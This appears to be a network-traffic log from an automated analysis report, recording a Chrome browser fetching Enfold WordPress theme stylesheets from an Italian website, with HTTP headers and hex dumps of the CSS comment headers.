                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:55 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:55 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2078
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:55 UTC2078INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 53 6c 69 64 65 73 68 6f 77 20 46 65 61 74 75 72 65 20 49 6d 61 67 65 20 53 6c 69 64 65 72 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Slideshow Feature Image Slider======================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              41192.168.2.164976289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:54 UTC654OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullsize/slideshow_fullsize.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:55 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:55 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 5651
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:55 UTC5651INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 53 6c 69 64 65 73 68 6f 77 20 46 75 6c 6c 77 69 64 74 68 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Slideshow Fullwidth=================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              42192.168.2.164976389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:55 UTC658OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:55 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:55 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2070
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:55 UTC2070INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 53 6c 69 64 65 73 68 6f 77 20 46 75 6c 6c 73 63 72 65 65 6e 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Slideshow Fullscreen================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              43192.168.2.164976489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:55 UTC660OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:56 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:56 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 4907
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:56 UTC4907INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 4c 61 79 65 72 20 53 6c 69 64 65 72 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Layer Slider========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              44192.168.2.164976689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:55 UTC642OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/social_share/social_share.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:56 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:56 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 1252
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:56 UTC1252INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 53 68 61 72 65 20 42 6f 78 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Share Box===========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              45192.168.2.164976589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:55 UTC640OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:56 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:56 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 4748
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:56 UTC4748INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0d 0a 54 61 62 20 53 45 43 54 49 4f 4e 0d 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Tab SECTION=======================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              46192.168.2.164976789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:55 UTC628OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/table/table.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:56 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:56 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 6692
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:56 UTC6692INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 54 61 62 6c 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Table===============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              47192.168.2.164976889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:56 UTC626OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:56 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:56 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 3691
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:56 UTC3691INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 54 61 62 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Tabs================================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              48192.168.2.164976989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:56 UTC626OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/team/team.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:56 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:56 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 3478
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
